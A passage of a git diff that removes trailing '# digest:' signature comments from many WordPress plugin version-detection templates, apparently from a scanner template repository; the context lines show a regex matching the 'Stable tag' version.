index 0360c94b83..fc498e67e6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 480a004530430220093aeb789258544ddbdfe3001269740549b3514c3c6f543385e2eab1e3c714fc021f6ea1e7b7ac63afbc7f3ad8eaa8bf54316f8b1c2013292d543bb7ee5bd0aa8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 89853142ff..465aa93d57 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100936350b92d3d5d54a132b08377a4a8f3794f554bcb9dd1af73e0ec4118b6e131022100fd919489ea2855b3c9c5c8b6b2dfa5b2707ddffb2907478641fc45dee8317ae0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 98d3ffbd14..2a1b0e57a9 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220445ede26cd32cadcc383ee0b93f9e8003a5c93c5ec1124f4f9c6c747e3d00dd502206c1978b6d90aae34960403ed7036bb320d770a8e1b2791274b25dd3c32335f26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index abb4812e94..df35e8b415 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ff4221fd50cc6978ee7ade1116ae253d8ee0ceceae9c72a476667da150b7e285022100e266c96dfa2b2112aabf7f99008af1324fd220b67695bf64639d736030a87014:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 06131fc78d..033cc4bc3d 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022045c324f301105020858c6272443e8afd58b109f2ab4923af083b407b550886bb022002672116954b7e6d229d5e8287a86920f3aa017e548372d5d2d0ae1deed2df5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluent-smtp.yaml b/http/technologies/wordpress/plugins/fluent-smtp.yaml index 6d03a33233..4a3dcbd210 100644 --- a/http/technologies/wordpress/plugins/fluent-smtp.yaml +++ b/http/technologies/wordpress/plugins/fluent-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207f69468ded2c6590eae293e92798c3c38d91c19da154ded90057a51328f19236022072c952edc96e50d4d7c14ca01816c4cf22563ac505308b8d75abc45705a01a3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 91b37beeb1..945ab6ad03 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100df20c93eb4c061355cfeb75ba953616cf389b280ad31915eb30e60b917f2b96e022100e7aea68c345f351ef71388ac5fcd11c45bee8902bd2697d355234764779028af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 6d959303fa..2072b51ab9 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220443ac7d2b73046306693fd6228ca8ac0e44d597b60ae4c9c2e252bb3f079ac96022100b523879f99c4a03eb67d53132f60724e7d14df2d099a5fa71afd44192ec07405:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index fd1c4c62e3..b509d8cc67 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bad56c53fd88707e922e905ab0e40c9febfe8bf60de324d80289f4b99a75b807022100d8770bc4eaca0a018fa9ab2f035f473776b7039a8a28c24bb2661828df8669c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 2751fdf88f..c984479bde 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008190fea18cf435d5cd983b1291e8eea7aa0a6df026350ca798dd09b24f8e37570220409fc61470f0bd0fe31727623e13dc0b2117d4b5871148622a68f4375c0fed27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index a0647952cb..a3870175c7 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220010a6287370076a390ddba157ae2ba9b5308d98e222dd6ce27623d5a4e5b18b4022100c02f2c2073501da09ad3406787c7c7f2b961bd6196890fbc9ed5928583a62214:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 50c7da225f..f5f3818ea2 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022014b9594f15a8ba207d3f2e061c5c5efa6e5bad6a2372c1462063bff3632f6fd8022100d560cef276e4d681b361240ac7e4100aee74b8192a43e2404c4181edf19a1e60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index e0a7c9808b..7e5b54c12c 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220695baf82a80c59727d9400f602900b848593d479f958e470b121ae1f3f1d44c0022100ab017f4b0030863061626673fb7a89e51af78d0ae1a8bf096ea120fec807ccfc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 770db8b3ba..59effd09f6 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022034e1c4bec904f226e723aa6dd9f1a1835f0f90ecb3cf1657a61efb8b20d7293e022013fdc96c3d887012762e6cb82eac26c0d4b7650b8af42fa6094df95cef98fe34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 7f19677e85..833207dcff 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205b19ef3b4199650cb799a577b3330a06d9d9803bd68fd6ce05c4fcd1063f7240022100c49e3b43cefc7add40fc95faa151e23f91e8867a3212f82d85fa6aa7945c7c1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index ab7740a4cb..b7ea2d38d1 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b5a11002bf3561783abaed70a8abd59f0d439f370950a2070d73b3772b299df0022100a850a588a5fcd2562f6681ef9bcca8a59ac7d2087c2e8d2452064eb4aceb3f0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index ad2cd5fb8b..2131dbe751 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206f486407128539515cb70e6d621f694120fa6d20105b6cdf2031ee92803dcd6c0220677d6b7c10e280238f9dd7e15102a47554bbcaf6fc6bf460e0391be50f677f42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 22bb6f22ba..73d644c5e4 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b121150f32e656d029f72fd85576cfd2bba6c04a3806f6e0817bc5be3c05a191022016a1f27f724dd34bbadf74723a5f4c48a8f8ac4bb55156e6eb44246ad7e70116:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 5a42f41456..7b0593dcb7 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202f95244c48676874a8e0043425dd712257ead8288634c4e86f303dcc1053f47602202f7a343ab06d2033a9a919d6b47f8d2d277767fea68f1ed246f160ceeb7e4a9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 2bdbd9cfe1..6f65d087e4 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220079161c4fc448a53a31a700cfe47d1f97659b7dbe13fcd0cfcbbee390d16e7b1022100ee4c5f1705ab8fb2ae9f848a4d7eb7d41cd911881131cb4607d4a59d842f04f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index abdd20948d..783cdd283d 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203c5f7e54a22056bfb5044b4e181a0825294d5287d01844bb707e532477946f660220050ded95651d286f0c6d025a9ab490f1a065c828679d489d3cc3511149c53aa2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 76d21f07c7..05121854b3 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210096d3115d5ef9d5e678e17a7eddac81724ef738bf53a56956739d6067f743bd1b02207b0cea3981db5343165cb119be65b2167c5917d35da6e8506701cd237f355174:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index c57ce4b9be..72f52edcd4 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008db1bda45be3521781661824717ec6503f3c33ec23b991003b2a441fd96abbab0220356cf8e9994a4a0962cd09e153a83f96b73d51d59be01b6c94066199c9c799bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index a883b44cfd..4cf45ebd74 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022012c0c8215866b450ddcd8db47d555ad93012a5d75d877eca35e5931a908c4af4022100d151abe74b8565eab97a964a5f7b330eb6471f55f4d471a1eccb58a691ed7ea5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 81cf755362..3d6863e074 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c0ab0e0966b909d1530e5210859b19b6bafd767d2effba0718a9f3e16a8a7734022100b7ff21f8e2e715de2e78a96bd8086333721e16e1e260b1aef16753064fec1beb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 835347ec68..79e2813c5e 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202266f3743bce2b08ab3e2411f4051c53718b9317abe46ade535f2db54ecfdcdc022100b483d0a7c2e585f545b1ee9d5453e8cd834835cbd6bea5257347e90c20abe879:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ba772c889e..ab9a0f1ae3 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022074270c2e423d8f6f284751be894600965bfb358e4c478669fe4c6d8bca99cc3a022100d539d88bae915b0d997ebf3ae019b2745c7ad9b46e44c6fbe46c8d52f845cb15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 8846606d62..5d3adf7c27 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d8ddcce446e439879b2573a71e5f82cc829ba5526ec3e8af0a131b86fb69c712022066c0be0356f3ef5e25404ceabfd43ec678482be42f23b834f320e2ff3cd30c3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index 290db9fe5e..eda1d27f04 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220358378a4329691af07e4535c45f69ef92fd0bf98fc430b5e0c14f81ddcecc90302201dbd3a41230b88244b5aaab7470d8bccf1c974c52c891bfdd05eb766173eec3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 17e18e6a75..16dfc8df5f 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ec3a22944c38e6e0fa36f99c349a327cf1a655ce1688e36c087cd5142de7645a022074c87d5dedcd45f88dc61063a4108cf2e8e89de3c89518a8902e764d96a65b2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 5c0bb7e445..4b7600ea69 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207253fc6b7fd32c134813f9eddf87963e2897570b4ae8361681926dc06a2ded2e022100dd9fdfe9884612114ef02a3aebdcda933bdd608d5b2d8fe01caed2fa9271167d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 42a537112c..2ccd4dbce8 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cd454ddc6b7e2ab008a9b9f3c87d2458b02bbd117a96c4bee75095bacf741985022100dad09739bee2ac293075fc188addbd33285fdb1440251076b436d09d7de10de6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 4726be8f14..02ceb224d1 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204dbd9e3918703ed6e45c04b9e0ad25fc6e28e3b32613bc2c8864fcdb33b5a196022060d01aae5953ea4da166e24416090d05cd3bfd9712bde3ee8e310464910d2181:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 195dfe9bad..367d587ce2 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022075f4aea2e7fb75c775132b1805fa4c05fa47a4a38d8959701dd221ad78582351022100ee56f99192d32e271a5cd4555f23e816305b7371a5d573ecafed88b9f8a3095a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 3acfe613f8..feed730ee0 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e19fdac1f587bbb3d4f7c64b8e02bf26e0a452f5cfccad8c047074dfb10aa3d50220756f5f66e404db56ba52bdae31192e0416747a3f30b0c5bbe3d0ff37e97dd5ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 743dc948fb..9b2841e7ca 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009f0ced598e8b5f9cad246c1b2986e31da108b8f979b45e2167197f3a27893dad02205c4f509cb56e647240140b1537eb253a8bd49a02958aa51c94999b9639404373:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index bd8c965624..42be14c5df 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a512274f1c7078a8459d96d2567fd849b0525ef5beb688103a005b304858ee4102203d069ab818ab2e854ffa18638453721751d620d8e522b2bc6e5c1344227e7c45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 788933d914..4e0cd86c3f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220693dc7287d237ff60a83fdabc5c3cf1b8f1b1b383c576ac59dcb5c7657d8f927022100f5fcac3bfb8f98318e48fe2d85d87e6cbdcf2f38b7f3a2c9c122abb59831689e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 9bb0f57bb1..59eadc5e6e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022012a42e9194794d64187c48dcd017e3c54c86ed18987b7d66743acfd13caebfde022100a0b4523c073f0bcfeaa972c36048be283742f79296cc6cb6e0bf662d9b376ef8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 6e19228e03..41f7a0075e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008ce949c4768918ba2794f17c2981df41cfeba83caa83d5e34fa361b77f8dec70022100cd2c8aff9d37fe823e1b895131aafde91dcdd3bd2fea8fe99b887debccd4a9ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 0b4f988394..7e35a3fb4f 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c098be68db454319ecb11ed54fc7d74a1a7224f53224942891a477877cb27be3022100b97c55f2cd5331f8e0265872b9be5d81f392145f44e0b1ccc7c046468da55a0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index e5444a6823..18c2a7586e 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b8ec25efa468f1f9c2c3e06af6d3ddc578a97d1c767f2fc22a6b5efa4c8c1b390220485f3f80f48878fafbf119b379b8f35851fc38751184673676a6884c7bac94a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 492649f361..6bc2aa78f9 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b37a5bb840d4e4b3623e049a02ef5d7a162f1e270745ba80393005edbbd56df802200d2b513dbed91bbf4cedf2f2e6f882d59f7c3c3b4384907d1e054629aa4bec29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index bc60a5e556..a43d3352a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022079ebf3375178607d374e2247df8ef26c0c2c6a6d02612e4bcc9402df7f5263e402207618ca2920eae376f7ec4fee4889e5bef656c2149ff657405d5b4ea8e2b0d260:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 60d49ba699..e7db9944e4 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100961fbbc3edfec446e7ec2a2ba079d54f4edf9e9b6332ab13d9503c13a80af795022100a1654564a372590e5aa8051f117bdcb9079ae88a4cb76d9f8ed8853f237d1f71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 06dd3f5ea6..268bd7b9df 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c85f7bac96dd7b1d8ad81c8d542a24e837bdee7227e89406130e272b284175a5022100c52f76fdcdd4b7d94592b214ae12910da258a6098f602b065897d415f3574b9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 53fa7725ba..d7fb2209d1 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210092ca409cc9c0883c229217dbdc30c7c5b467d0c9d3f5451a5608e219440164f30220239ee3681f07358c526f631fc558630f75382d0ed101b71a47c72d993ae8cf99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 794cb52195..a1641d4632 100644 --- 